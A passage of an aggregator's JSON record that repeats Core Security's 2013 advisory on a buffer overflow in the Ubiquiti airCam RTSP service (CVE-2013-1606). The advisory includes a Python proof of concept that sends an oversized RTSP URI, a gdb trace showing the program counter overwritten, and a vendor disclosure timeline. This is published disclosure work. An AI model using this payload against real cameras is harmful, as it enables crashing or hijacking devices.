advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://corelabs.coresecurity.com. \n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of threats \nwith security test and measurement solutions that continuously identify \nand demonstrate real-world exposures to their most critical assets. Our \ncustomers can gain real visibility into their security standing, real \nvalidation of their security controls, and real metrics to more \neffectively secure their organizations. \n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2013 Core Security \nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121986/CORE-2013-0430.txt"}], "exploitdb": [{"lastseen": "2016-02-03T02:55:49", "description": "Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow. CVE-2013-1606. Dos exploit for hardware platform", "published": "2013-06-12T00:00:00", "type": "exploitdb", "title": "Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1606"], "modified": "2013-06-12T00:00:00", "id": "EDB-ID:26138", "href": "https://www.exploit-db.com/exploits/26138/", "sourceData": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com\r\n\r\nBuffer overflow in Ubiquiti airCam RTSP service\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Buffer overflow in Ubiquiti airCam RTSP service\r\nAdvisory ID: CORE-2013-0430\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service\r\nDate published: 2013-06-11\r\nDate of last update: 2013-06-11\r\nVendors contacted: Ubiquiti\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Classic buffer overflow [CWE-120]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1606\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nThe Ubiquiti [1] airCam RTSP service 'ubnt-streamer', has a buffer\r\noverflow when parsing the URI of a RTSP request message. This bug allows\r\nremote attackers to execute arbitrary code via RTSP request message.\r\n\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . Cameras Models: airCam, airCam Mini, airCam Dome.\r\n . Firmware Version Verified: AirCam v1.1.5.\r\n . Other devices are probably affected too, but they were not checked.\r\n\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\n . firmware v1.2.0 (airVision 2.x platform).\r\n . firmware v1.1.6 (airVision 1.x platform).\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nPatched firmware versions can be downloaded from the Ubiquiti official\r\nwebsite [2], [3].\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Andres Blanco\r\nfrom Core Exploit Writers Team. The publication of this advisory was\r\ncoordinated by Fernando Miranda from Core Advisories Team.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n/-----\r\n#\r\n# Author: Andres Blanco - CORE Security Technologies.\r\n#\r\n# The contents of this software are copyright (c) 2013 CORE Security and\r\n(c) 2013 CoreLabs,\r\n# and are licensed under a Creative Commons Attribution Non-Commercial\r\nShare-Alike 3.0 (United States)\r\n# License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n#\r\n# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED\r\n# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE\r\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR\r\n# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF\r\n# THIS SOFTWARE.\r\n#\r\n\r\nimport socket\r\n\r\nclass RtspRequest(object):\r\n\r\n def __init__(self, ip_address, port):\r\n self._ip_address = ip_address\r\n self._port = port\r\n\r\n def generate_request(self, method, uri, headers):\r\n data = \"\"\r\n data += \"%s %s RTSP/1.0\\r\\n\" % (method, uri)\r\n for item in headers:\r\n header = headers[item]\r\n data += \"%s: %s\\r\\n\" % (item, header)\r\n data += \"\\r\\n\"\r\n return data\r\n\r\n def send_request(self, data):\r\n sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sd.settimeout(15)\r\n sd.connect((self._ip_address, self._port))\r\n sd.send(data)\r\n resp = sd.recv(2048)\r\n sd.close()\r\n return resp\r\n\r\nif __name__ == \"__main__\":\r\n ip = \"192.168.100.1\"\r\n anRtsp = RtspRequest(ip, 554)\r\n data = \"\"\r\n data += \"A\" * 271\r\n data += \"\\x78\\x56\\x34\\x12\"\r\n uri = \"rtsp://%s/%s/live/ch00_0\" % (ip, data)\r\n headers = { \"CSeq\" : \"1\" }\r\n req = anRtsp.generate_request(\"DESCRIBE\", uri, headers)\r\n rsp = anRtsp.send_request(req)\r\n-----/\r\n\r\nBelow the gdb session when executing the PoC.\r\n\r\n/-----\r\nAirCam.v1.1.5# ./gdb --pid 358\r\n...\r\nAttaching to process 358\r\n\r\nwarning: process 358 is a cloned process\r\nReading symbols from /bin/ubnt-streamer...(no debugging symbols\r\nfound)...done.\r\nReading symbols from /lib/libpthread.so.0...(no debugging symbols\r\nfound)...done.\r\n...\r\n0x401c60a0 in select () from /lib/libc.so.6\r\n(gdb) c\r\nContinuing.\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x12345678 in ?? ()\r\n(gdb) info registers\r\nr0 0x0 0\r\nr1 0x1 1\r\nr2 0xffffffff 4294967295\r\nr3 0x1 1\r\nr4 0x41414141 1094795585\r\nr5 0x41414141 1094795585\r\nr6 0x41414141 1094795585\r\nr7 0xd7198 881048\r\nr8 0x0 0\r\nr9 0x0 0\r\nr10 0xc6119 811289\r\nr11 0xc625f 811615\r\nr12 0x23 35\r\nsp 0x40a7eaf0 0x40a7eaf0\r\nlr 0x48d34 298292\r\npc 0x12345678 0x12345678\r\ncpsr 0x20000010 536870928\r\n(gdb) info stack\r\n#0 0x12345678 in ?? ()\r\n#1 0x00048d34 in ?? ()\r\n#2 0x00048d34 in ?? ()\r\nBacktrace stopped: previous frame identical to this frame (corrupt stack?)\r\n(gdb) x/50xw $sp-0x80\r\n0x40a7ea70: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7ea80: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7ea90: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eaa0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eab0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eac0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7ead0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eae0: 0x41414141 0x41414141 0x41414141 0x12345678\r\n0x40a7eaf0: 0x76696c2f 0x68632f65 0x305f3030 0x000d7100\r\n0x40a7eb00: 0x000c6060 0x000c6119 0x00059340 0x000491a8\r\n0x40a7eb10: 0x000d73f6 0x000c6267 0x00000001 0x000c6060\r\n0x40a7eb20: 0x000c6119 0x00059340 0x000c6118 0x00049780\r\n0x40a7eb30: 0x00000000 0x000c611c\r\n-----/\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2013-05-02:\r\nCore Security Technologies notifies the Ubiquiti team of the\r\nvulnerability. Publication date is set for May 29th, 2013.\r\n\r\n. 2013-05-02:\r\nVendor acknowledges the receipt of the email and asks for technical\r\ndetails.\r\n\r\n. 2013-05-02:\r\nA draft report with technical details and a PoC sent to Ubiquiti team.\r\n\r\n. 2013-05-03:\r\nVendor notifies that a new firmware version should address this\r\nvulnerability. It will be released shortly to the alpha and beta community.\r\n\r\n. 2013-05-06:\r\nCore notifies that the advisory will be re-scheduled to be released when\r\npatches are available to the alpha and beta community and asks for a\r\ntentative release date.\r\n\r\n. 2013-05-09:\r\nCore asks for a status update regarding this vulnerability and a\r\ntentative release date.\r\n\r\n. 2013-05-13:\r\nVendor notifies the firmware is still in internal testing and the\r\nrelease date will be confirmed in the following days.\r\n\r\n. 2013-05-27:\r\nCore notifies that there was no answer in the last 2 weeks regarding the\r\nrelease date. Core also notifies that the advisory was re-scheduled for\r\nJun 4th, and asks for a clear timeline to justify keep delaying the\r\nrelease.\r\n\r\n. 2013-05-28:\r\nVendor notifies that the new firmware is almost done and a confirmed\r\ndate will be notified in the following days.\r\n\r\n. 2013-05-29:\r\nCore asks if a beta firmware is available for downloading.\r\n\r\n. 2013-05-29:\r\nVendor notifies that they have a v1.1.6 build of the firmware which is\r\nbeing tested internally and will be released very soon, probably this\r\nweek. However, it is not yet available on the ubnt.com/download site.\r\n\r\n. 2013-05-29:\r\nFirst release date missed.\r\n\r\n. 2013-06-03:\r\nCore asks for a status update.\r\n\r\n. 2013-06-03:\r\nVendor notifies that they do not have a specific release date yet.\r\n\r\n. 2013-06-11:\r\nVendor notifies that they released firmware 1.2.0 along with airVision 2\r\n[2][3], and a public announcement will be made soon. Release of firmware\r\n1.1.6 (for the airVision 1.x platform) has to be defined.\r\n\r\n. 2013-06-11:\r\nAdvisory CORE-2013-0430 published.\r\n\r\n\r\n10. *References*\r\n\r\n[1] http://www.ubnt.com.\r\n[2] Ubiquiti downloads http://www.ubnt.com/download#AirCam.\r\n[3] Ubiquiti firmware v1.2.0\r\nhttp://www.ubnt.com/downloads/AirCam-v1.2.0.build17961.bin.\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26138/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-1606"], "description": "\r\n\r\nCore Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com\r\n\r\nBuffer overflow in Ubiquiti airCam RTSP service\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Buffer overflow in Ubiquiti airCam RTSP service\r\nAdvisory ID: CORE-2013-0430\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service\r\nDate published: 2013-06-11\r\nDate of last update: 2013-06-11\r\nVendors contacted: Ubiquiti\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Classic buffer overflow [CWE-120]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1606\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nThe Ubiquiti [1] airCam RTSP service 'ubnt-streamer', has a buffer\r\noverflow when parsing the URI of a RTSP request message. This bug allows\r\nremote attackers to execute arbitrary code via RTSP request message.\r\n\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . Cameras Models: airCam, airCam Mini, airCam Dome.\r\n . Firmware Version Verified: AirCam v1.1.5.\r\n . Other devices are probably affected too, but they were not checked.\r\n\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\n . firmware v1.2.0 (airVision 2.x platform).\r\n . firmware v1.1.6 (airVision 1.x platform).\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nPatched firmware versions can be downloaded from the Ubiquiti official\r\nwebsite [2], [3].\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Andres Blanco\r\nfrom Core Exploit Writers Team. The publication of this advisory was\r\ncoordinated by Fernando Miranda from Core Advisories Team.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n/-----\r\n#\r\n# Author: Andres Blanco - CORE Security Technologies.\r\n#\r\n# The contents of this software are copyright (c) 2013 CORE Security and\r\n(c) 2013 CoreLabs,\r\n# and are licensed under a Creative Commons Attribution Non-Commercial\r\nShare-Alike 3.0 (United States)\r\n# License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n#\r\n# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED\r\n# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE\r\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR\r\n# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF\r\n# THIS SOFTWARE.\r\n#\r\n\r\nimport socket\r\n\r\nclass RtspRequest(object):\r\n\r\n def __init__(self, ip_address, port):\r\n self._ip_address = ip_address\r\n self._port = port\r\n\r\n def generate_request(self, method, uri, headers):\r\n data = ""\r\n data += "%s %s RTSP/1.0\r\n" % (method, uri)\r\n for item in headers:\r\n header = headers[item]\r\n data += "%s: %s\r\n" % (item, header)\r\n data += "\r\n"\r\n return data\r\n\r\n def send_request(self, data):\r\n sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sd.settimeout(15)\r\n sd.connect((self._ip_address, self._port))\r\n sd.send(data)\r\n resp = sd.recv(2048)\r\n sd.close()\r\n return resp\r\n\r\nif __name__ == "__main__":\r\n ip = "192.168.100.1"\r\n anRtsp = RtspRequest(ip, 554)\r\n data = ""\r\n data += "A" * 271\r\n data += "\x78\x56\x34\x12"\r\n uri = "rtsp://%s/%s/live/ch00_0" % (ip, data)\r\n headers = { "CSeq" : "1" }\r\n req = anRtsp.generate_request("DESCRIBE", uri, headers)\r\n rsp = anRtsp.send_request(req)\r\n-----/\r\n\r\nBelow the gdb session when executing the PoC.\r\n\r\n/-----\r\nAirCam.v1.1.5# ./gdb --pid 358\r\n...\r\nAttaching to process 358\r\n\r\nwarning: process 358 is a cloned process\r\nReading symbols from /bin/ubnt-streamer...(no debugging symbols\r\nfound)...done.\r\nReading symbols from /lib/libpthread.so.0...(no debugging symbols\r\nfound)...done.\r\n...\r\n0x401c60a0 in select () from /lib/libc.so.6\r\n(gdb) c\r\nContinuing.\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x12345678 in ?? ()\r\n(gdb) info registers\r\nr0 0x0 0\r\nr1 0x1 1\r\nr2 0xffffffff 4294967295\r\nr3 0x1 1\r\nr4 0x41414141 1094795585\r\nr5 0x41414141 1094795585\r\nr6 0x41414141 1094795585\r\nr7 0xd7198 881048\r\nr8 0x0 0\r\nr9 0x0 0\r\nr10 0xc6119 811289\r\nr11 0xc625f 811615\r\nr12 0x23 35\r\nsp 0x40a7eaf0 0x40a7eaf0\r\nlr 0x48d34 298292\r\npc 0x12345678 0x12345678\r\ncpsr 0x20000010 536870928\r\n(gdb) info stack\r\n#0 0x12345678 in ?? ()\r\n#1 0x00048d34 in ?? ()\r\n#2 0x00048d34 in ?? ()\r\nBacktrace stopped: previous frame identical to this frame (corrupt stack?)\r\n(gdb) x/50xw $sp-0x80\r\n0x40a7ea70: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7ea80: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7ea90: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eaa0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eab0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eac0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7ead0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eae0: 0x41414141 0x41414141 0x41414141 0x12345678\r\n0x40a7eaf0: 0x76696c2f 0x68632f65 0x305f3030 0x000d7100\r\n0x40a7eb00: 0x000c6060 0x000c6119 0x00059340 0x000491a8\r\n0x40a7eb10: 0x000d73f6 0x000c6267 0x00000001 0x000c6060\r\n0x40a7eb20: 0x000c6119 0x00059340 0x000c6118 0x00049780\r\n0x40a7eb30: 0x00000000 0x000c611c\r\n-----/\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2013-05-02:\r\nCore Security Technologies notifies the Ubiquiti team of the\r\nvulnerability. Publication date is set for May 29th, 2013.\r\n\r\n. 2013-05-02:\r\nVendor acknowledges the receipt of the email and asks for technical\r\ndetails.\r\n\r\n. 2013-05-02:\r\nA draft report with technical details and a PoC sent to Ubiquiti team.\r\n\r\n. 2013-05-03:\r\nVendor notifies that a new firmware version should address this\r\nvulnerability. It will be released shortly to the alpha and beta community.\r\n\r\n. 2013-05-06:\r\nCore notifies that the advisory will be re-scheduled to be released when\r\npatches are available to the alpha and beta community and asks for a\r\ntentative release date.\r\n\r\n. 2013-05-09:\r\nCore asks for a status update regarding this vulnerability and a\r\ntentative release date.\r\n\r\n. 2013-05-13:\r\nVendor notifies the firmware is still in internal testing and the\r\nrelease date will be confirmed in the following days.\r\n\r\n. 2013-05-27:\r\nCore notifies that there was no answer in the last 2 weeks regarding the\r\nrelease date. Core also notifies that the advisory was re-scheduled for\r\nJun 4th, and asks for a clear timeline to justify keep delaying the\r\nrelease.\r\n\r\n. 2013-05-28:\r\nVendor notifies that the new firmware is almost done and a confirmed\r\ndate will be notified in the following days.\r\n\r\n. 2013-05-29:\r\nCore asks if a beta firmware is available for downloading.\r\n\r\n. 2013-05-29:\r\nVendor notifies that they have a v1.1.6 build of the firmware which is\r\nbeing tested internally and will be released very soon, probably this\r\nweek. However, it is not yet available on the ubnt.com/download site.\r\n\r\n. 2013-05-29:\r\nFirst release date missed.\r\n\r\n. 2013-06-03:\r\nCore asks for a status update.\r\n\r\n. 2013-06-03:\r\nVendor notifies that they do not have a specific release date yet.\r\n\r\n. 2013-06-11:\r\nVendor notifies that they released firmware 1.2.0 along with airVision 2\r\n[2][3], and a public announcement will be made soon. Release of firmware\r\n1.1.6 (for the airVision 1.x platform) has to be defined.\r\n\r\n. 2013-06-11:\r\nAdvisory CORE-2013-0430 published.\r\n\r\n\r\n10. *References*\r\n\r\n[1] http://www.ubnt.com.\r\n[2] Ubiquiti downloads http://www.ubnt.com/download#AirCam.\r\n[3] Ubiquiti firmware v1.2.0\r\nhttp://www.ubnt.com/downloads/AirCam-v1.2.0.build17961.bin.\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n\r\n", "edition": 1, "modified": "2013-06-17T00:00:00", "published": "2013-06-17T00:00:00", "id": "SECURITYVULNS:DOC:29476", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29476", "title": "CORE-2013-0430 - Buffer overflow in Ubiquiti airCam RTSP service", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:51", "bulletinFamily": "software", "cvelist": ["CVE-2013-1606"], "description": "Buffer overflow in RTSP service", "edition": 1, "modified": "2013-06-17T00:00:00", "published": "2013-06-17T00:00:00", "id": "SECURITYVULNS:VULN:13134", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13134", "title": "Ubiquiti airCam buffer overflow", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:52", "description": "\nUbiquiti airCam RTSP Service 1.1.5 - Buffer Overflow (PoC)", "edition": 1, "published": "2013-06-12T00:00:00", "title": "Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1606"], "modified": "2013-06-12T00:00:00", "id": "EXPLOITPACK:CD3DBE0EB54758980B10BB811B72AB88", "href": "", "sourceData": "Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com\n\nBuffer overflow in Ubiquiti airCam RTSP service\n\n\n1. *Advisory Information*\n\nTitle: Buffer overflow in Ubiquiti airCam RTSP service\nAdvisory ID: CORE-2013-0430\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service\nDate published: 2013-06-11\nDate of last update: 2013-06-11\nVendors contacted: Ubiquiti\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Classic buffer overflow [CWE-120]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-1606\n\n\n3. *Vulnerability Description*\n\nThe Ubiquiti [1] airCam RTSP service 'ubnt-streamer', has a buffer\noverflow when parsing the URI of a RTSP request message. This bug allows\nremote attackers to execute arbitrary code via RTSP request message.\n\n\n4. *Vulnerable Packages*\n\n . Cameras Models: airCam, airCam Mini, airCam Dome.\n . Firmware Version Verified: AirCam v1.1.5.\n . Other devices are probably affected too, but they were not checked.\n\n\n5. *Non-Vulnerable Packages*\n\n . firmware v1.2.0 (airVision 2.x platform).\n . firmware v1.1.6 (airVision 1.x platform).\n\n6. *Vendor Information, Solutions and Workarounds*\n\nPatched firmware versions can be downloaded from the Ubiquiti official\nwebsite [2], [3].\n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Andres Blanco\nfrom Core Exploit Writers Team. The publication of this advisory was\ncoordinated by Fernando Miranda from Core Advisories Team.\n\n\n8. *Technical Description / Proof of Concept Code*\n\n\n/-----\n#\n# Author: Andres Blanco - CORE Security Technologies.\n#\n# The contents of this software are copyright (c) 2013 CORE Security and\n(c) 2013 CoreLabs,\n# and are licensed under a Creative Commons Attribution Non-Commercial\nShare-Alike 3.0 (United States)\n# License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n#\n# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR\n# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF\n# THIS SOFTWARE.\n#\n\nimport socket\n\nclass RtspRequest(object):\n\n def __init__(self, ip_address, port):\n self._ip_address = ip_address\n self._port = port\n\n def generate_request(self, method, uri, headers):\n data = \"\"\n data += \"%s %s RTSP/1.0\\r\\n\" % (method, uri)\n for item in headers:\n header = headers[item]\n data += \"%s: %s\\r\\n\" % (item, header)\n data += \"\\r\\n\"\n return data\n\n def send_request(self, data):\n sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sd.settimeout(15)\n sd.connect((self._ip_address, self._port))\n sd.send(data)\n resp = sd.recv(2048)\n sd.close()\n return resp\n\nif __name__ == \"__main__\":\n ip = \"192.168.100.1\"\n anRtsp = RtspRequest(ip, 554)\n data = \"\"\n data += \"A\" * 271\n data += \"\\x78\\x56\\x34\\x12\"\n uri = \"rtsp://%s/%s/live/ch00_0\" % (ip, data)\n headers = { \"CSeq\" : \"1\" }\n req = anRtsp.generate_request(\"DESCRIBE\", uri, headers)\n rsp = anRtsp.send_request(req)\n-----/\n\nBelow the gdb session when executing the PoC.\n\n/-----\nAirCam.v1.1.5# ./gdb --pid 358\n...\nAttaching to process 358\n\nwarning: process 358 is a cloned process\nReading symbols from /bin/ubnt-streamer...(no debugging symbols\nfound)...done.\nReading symbols from /lib/libpthread.so.0...(no debugging symbols\nfound)...done.\n...\n0x401c60a0 in select () from /lib/libc.so.6\n(gdb) c\nContinuing.\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x12345678 in ?? ()\n(gdb) info registers\nr0 0x0 0\nr1 0x1 1\nr2 0xffffffff 4294967295\nr3 0x1 1\nr4 0x41414141 1094795585\nr5 0x41414141 1094795585\nr6 0x41414141 1094795585\nr7 0xd7198 881048\nr8 0x0 0\nr9 0x0 0\nr10 0xc6119 811289\nr11 0xc625f 811615\nr12 0x23 35\nsp 0x40a7eaf0 0x40a7eaf0\nlr 0x48d34 298292\npc 0x12345678 0x12345678\ncpsr 0x20000010 536870928\n(gdb) info stack\n#0 0x12345678 in ?? ()\n#1 0x00048d34 in ?? ()\n#2 0x00048d34 in ?? ()\nBacktrace stopped: previous frame identical to this frame (corrupt stack?)\n(gdb) x/50xw $sp-0x80\n0x40a7ea70: 0x41414141 0x41414141 0x41414141 0x41414141\n0x40a7ea80: 0x41414141 0x41414141 0x41414141 0x41414141\n0x40a7ea90: 0x41414141 0x41414141 0x41414141 0x41414141\n0x40a7eaa0: 0x41414141 0x41414141 0x41414141 0x41414141\n0x40a7eab0: 0x41414141 0x41414141 0x41414141 0x41414141\n0x40a7eac0: 0x41414141 0x41414141 0x41414141 0x41414141\n0x40a7ead0: 0x41414141 0x41414141 0x41414141 0x41414141\n0x40a7eae0: 0x41414141 0x41414141 0x41414141 0x12345678\n0x40a7eaf0: 0x76696c2f 0x68632f65 0x305f3030 0x000d7100\n0x40a7eb00: 0x000c6060 0x000c6119 0x00059340 0x000491a8\n0x40a7eb10: 0x000d73f6 0x000c6267 0x00000001 0x000c6060\n0x40a7eb20: 0x000c6119 0x00059340 0x000c6118 0x00049780\n0x40a7eb30: 0x00000000 0x000c611c\n-----/\n\n\n9. *Report Timeline*\n\n. 2013-05-02:\nCore Security Technologies notifies the Ubiquiti team of the\nvulnerability. Publication date is set for May 29th, 2013.\n\n. 2013-05-02:\nVendor acknowledges the receipt of the email and asks for technical\ndetails.\n\n. 2013-05-02:\nA draft report with technical details and a PoC sent to Ubiquiti team.\n\n. 2013-05-03:\nVendor notifies that a new firmware version should address this\nvulnerability. It will be released shortly to the alpha and beta community.\n\n. 2013-05-06:\nCore notifies that the advisory will be re-scheduled to be released when\npatches are available to the alpha and beta community and asks for a\ntentative release date.\n\n. 2013-05-09:\nCore asks for a status update regarding this vulnerability and a\ntentative release date.\n\n. 2013-05-13:\nVendor notifies the firmware is still in internal testing and the\nrelease date will be confirmed in the following days.\n\n. 2013-05-27:\nCore notifies that there was no answer in the last 2 weeks regarding the\nrelease date. Core also notifies that the advisory was re-scheduled for\nJun 4th, and asks for a clear timeline to justify keep delaying the\nrelease.\n\n. 2013-05-28:\nVendor notifies that the new firmware is almost done and a confirmed\ndate will be notified in the following days.\n\n. 